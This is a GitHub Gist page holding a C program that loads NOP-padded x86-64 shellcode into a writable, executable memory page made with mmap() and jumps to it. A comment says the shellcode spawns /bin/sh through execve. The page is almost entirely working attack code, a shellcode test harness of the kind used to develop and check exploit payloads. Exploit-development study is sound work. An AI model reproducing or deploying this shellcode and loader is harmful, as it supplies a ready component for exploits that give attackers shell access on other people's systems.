Last active
August 28, 2017 18:51
-
-
Save safiire/d8100e85330da7d7067776b3a5c18a78 to your computer and use it in GitHub Desktop.
Copy Shellcode into a Write Exec mmap()'d area, and jump to it.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <string.h> | |
#include <sys/mman.h> | |
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <string.h> | |
// NOP padded execve("/bin/sh") | |
char *sc = | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" | |
"\x90\x90\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb" | |
"\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"; | |
int main(int argc, char **argv){ | |
// Let's use mmap to create a page of memory to write sc to. | |
long page_size = sysconf(_SC_PAGESIZE); | |
printf("The page size is 0x%lx\n", page_size); | |
void *start = (void*)(page_size * 3); | |
// Create one page of WX memory for the shellcode | |
void *memory = mmap(start, page_size, (PROT_WRITE | PROT_EXEC), MAP_PRIVATE | MAP_ANONYMOUS, 0, 0); | |
if(memory == MAP_FAILED){ | |
perror("mmap error:"); | |
} | |
printf("Got a memory region at %p\n", memory); | |
// Let's copy the shellcode into memory region | |
strcpy(memory, sc); | |
int (*f)() = (int (*))memory; | |
f(); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment